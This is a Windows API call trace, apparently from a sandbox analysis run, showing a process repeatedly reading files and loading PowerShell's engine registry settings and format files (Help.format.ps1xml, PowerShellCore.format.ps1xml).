	[0759.933] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.933] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.936] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.936] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.936] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.936] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.937] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.937] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.938] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.938] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.938] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.938] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.939] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.939] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.939] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.940] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.940] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0759.940] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.058] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.058] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.058] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.059] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.059] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.059] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.060] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.060] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.061] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.061] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0760.061] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.197] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.197] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.197] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.198] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.198] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.198] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.199] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.199] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.199] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.200] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.200] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.200] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.200] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.201] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.201] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.202] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.202] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.202] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.203] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0761.203] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0xf37, lpOverlapped=0x0) returned 1
	[0761.203] ReadFile (in: hFile=0x2f0, lpBuffer=0x31346df, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x31346df*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0761.203] ReadFile (in: hFile=0x2f0, lpBuffer=0x3135040, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x3135040*, lpNumberOfBytesRead=0x24d438*=0x0, lpOverlapped=0x0) returned 1
	[0761.204] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d4c8 | out: phkResult=0x24d4c8*=0x2f0) returned 0x0
	[0761.204] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d44c, lpData=0x0, lpcbData=0x24d448*=0x0 | out: lpType=0x24d44c*=0x1, lpData=0x0, lpcbData=0x24d448*=0x56) returned 0x0
	[0761.204] CoTaskMemAlloc (cb=0x5a) returned 0x1b8e2060
	[0761.204] RegQueryValueExW (in: hKey=0x2f0, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d41c, lpData=0x1b8e2060, lpcbData=0x24d418*=0x56 | out: lpType=0x24d41c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d418*=0x56) returned 0x0
	[0761.204] CoTaskMemFree (pv=0x1b8e2060) 
	[0761.204] RegCloseKey (hKey=0x2f0) returned 0x0
	[0761.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24d110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0761.204] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cfc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml", lpFilePart=0x0) returned 0x3d
	[0761.209] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xf05267fe, Data2=0x2b29, Data3=0x481a, Data4=([0]=0x91, [1]=0xc9, [2]=0x57, [3]=0x92, [4]=0x97, [5]=0x27, [6]=0x53, [7]=0xf5))) returned 0x0
	[0761.209] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc7bbb7, Data2=0xd0e8, Data3=0x42a8, Data4=([0]=0xa0, [1]=0x44, [2]=0x26, [3]=0xc1, [4]=0x5e, [5]=0xb2, [6]=0x4, [7]=0xef))) returned 0x0
	[0761.219] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xc660493e, Data2=0x18f8, Data3=0x49ad, Data4=([0]=0xb4, [1]=0x4a, [2]=0x35, [3]=0x75, [4]=0x22, [5]=0x24, [6]=0x53, [7]=0xc0))) returned 0x0
	[0761.219] VirtualQuery (in: lpAddress=0x24b700, lpBuffer=0x24c5c0, dwLength=0x30 | out: lpBuffer=0x24c5c0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0761.227] VirtualQuery (in: lpAddress=0x24b790, lpBuffer=0x24c650, dwLength=0x30 | out: lpBuffer=0x24c650*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0762.464] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xeb0107c2, Data2=0x6d2e, Data3=0x4678, Data4=([0]=0xa9, [1]=0x59, [2]=0x11, [3]=0x5c, [4]=0x91, [5]=0xc3, [6]=0xbd, [7]=0x7c))) returned 0x0
	[0762.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x90cb5421, Data2=0x912f, Data3=0x4283, Data4=([0]=0xba, [1]=0xe3, [2]=0x2f, [3]=0x9, [4]=0xbc, [5]=0xda, [6]=0x1a, [7]=0xe7))) returned 0x0
	[0762.481] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x52ae9d3f, Data2=0x6c2f, Data3=0x4686, Data4=([0]=0xb9, [1]=0xd0, [2]=0x84, [3]=0x68, [4]=0xf7, [5]=0xae, [6]=0x3c, [7]=0x4d))) returned 0x0
	[0762.484] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x55c23bc5, Data2=0x7a99, Data3=0x4284, Data4=([0]=0x9a, [1]=0xe6, [2]=0x3b, [3]=0x68, [4]=0xc, [5]=0xd5, [6]=0x16, [7]=0xc0))) returned 0x0
	[0762.484] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x11905f11, Data2=0x322f, Data3=0x4ca3, Data4=([0]=0xb6, [1]=0x5e, [2]=0x15, [3]=0x6e, [4]=0x9f, [5]=0x85, [6]=0x5c, [7]=0x15))) returned 0x0
	[0762.485] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x99349056, Data2=0xdf80, Data3=0x43bb, Data4=([0]=0xa1, [1]=0x99, [2]=0x36, [3]=0x0, [4]=0x4, [5]=0x1f, [6]=0x57, [7]=0xe6))) returned 0x0
	[0762.485] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xa00fa75, Data2=0x5ac1, Data3=0x4beb, Data4=([0]=0x86, [1]=0x49, [2]=0x95, [3]=0xdc, [4]=0x3f, [5]=0x16, [6]=0x12, [7]=0x18))) returned 0x0
	[0762.485] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x2a2859d9, Data2=0xd093, Data3=0x4447, Data4=([0]=0x88, [1]=0x1a, [2]=0x69, [3]=0x79, [4]=0x6d, [5]=0x65, [6]=0xdc, [7]=0xb7))) returned 0x0
	[0762.485] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x63ef1a5e, Data2=0xed, Data3=0x4a71, Data4=([0]=0xaf, [1]=0xd2, [2]=0x64, [3]=0x11, [4]=0xf0, [5]=0x24, [6]=0xd8, [7]=0xaa))) returned 0x0
	[0762.486] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x2dfbae94, Data2=0x295d, Data3=0x4ea4, Data4=([0]=0x9e, [1]=0x40, [2]=0xa1, [3]=0xdc, [4]=0xed, [5]=0x4b, [6]=0xd6, [7]=0xc7))) returned 0x0
	[0762.486] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x213705, Data2=0x305f, Data3=0x4de6, Data4=([0]=0x80, [1]=0x20, [2]=0xf9, [3]=0xbf, [4]=0x3c, [5]=0xd3, [6]=0xc7, [7]=0x5d))) returned 0x0
	[0762.486] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x155115eb, Data2=0x6927, Data3=0x47d3, Data4=([0]=0xb5, [1]=0xa3, [2]=0x93, [3]=0x57, [4]=0x28, [5]=0x3e, [6]=0xd1, [7]=0x20))) returned 0x0
	[0762.487] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xe9c779dd, Data2=0xc1a5, Data3=0x471a, Data4=([0]=0xae, [1]=0x15, [2]=0xcd, [3]=0x6, [4]=0xda, [5]=0xef, [6]=0x9c, [7]=0xa7))) returned 0x0
	[0762.488] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xdbec3ce1, Data2=0x5c62, Data3=0x4962, Data4=([0]=0x8f, [1]=0xf3, [2]=0x81, [3]=0xac, [4]=0x85, [5]=0x54, [6]=0xab, [7]=0x77))) returned 0x0
	[0762.489] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xa897451, Data2=0xab0c, Data3=0x4328, Data4=([0]=0x97, [1]=0x80, [2]=0x8, [3]=0x1b, [4]=0x81, [5]=0xd3, [6]=0x2d, [7]=0xec))) returned 0x0
	[0762.489] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x177fb278, Data2=0xf1f7, Data3=0x4e46, Data4=([0]=0x9f, [1]=0xe2, [2]=0xc1, [3]=0x68, [4]=0x94, [5]=0x17, [6]=0x1a, [7]=0x38))) returned 0x0
	[0762.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x9413dba7, Data2=0x7cf4, Data3=0x44a9, Data4=([0]=0x97, [1]=0xe6, [2]=0x52, [3]=0x2f, [4]=0xae, [5]=0x56, [6]=0xb4, [7]=0xa))) returned 0x0
	[0762.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xbed9a8b4, Data2=0x5d9e, Data3=0x4b8d, Data4=([0]=0x80, [1]=0x50, [2]=0xd7, [3]=0x75, [4]=0x54, [5]=0x6c, [6]=0xde, [7]=0x7))) returned 0x0
	[0762.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0xa08261d9, Data2=0xdffb, Data3=0x47d4, Data4=([0]=0x82, [1]=0x39, [2]=0x65, [3]=0x37, [4]=0x37, [5]=0x74, [6]=0x6b, [7]=0x4a))) returned 0x0
	[0762.490] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x5a1e1b8d, Data2=0x8663, Data3=0x4996, Data4=([0]=0x9f, [1]=0xfe, [2]=0x47, [3]=0x72, [4]=0x21, [5]=0x5e, [6]=0x58, [7]=0x81))) returned 0x0
	[0762.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x8e4e3563, Data2=0x825d, Data3=0x4984, Data4=([0]=0xa4, [1]=0x3c, [2]=0x65, [3]=0x48, [4]=0x24, [5]=0x2e, [6]=0x76, [7]=0xd1))) returned 0x0
	[0762.491] CoCreateGuid (in: pguid=0x24d6f0 | out: pguid=0x24d6f0*(Data1=0x91dcd19a, Data2=0x88dc, Data3=0x4683, Data4=([0]=0x96, [1]=0xae, [2]=0x6e, [3]=0x68, [4]=0x9b, [5]=0x30, [6]=0x7c, [7]=0x6e))) returned 0x0
	[0762.491] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f0
	[0762.491] GetFileType (hFile=0x2f0) returned 0x1
	[0762.491] SetErrorMode (uMode=0x1) returned 0x1
	[0762.491] GetFileType (hFile=0x2f0) returned 0x1
	[0762.491] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.492] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.493] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.494] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.494] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0762.494] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
	[0763.471] ReadFile (in: hFile=0x2f0, lpBuffer=0x2f79cc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d438, lpOverlapped=0x0 | out: lpBuffer=0x2f79cc8*, lpNumberOfBytesRead=0x24d438*=0x1000, lpOverlapped=0x0) returned 1
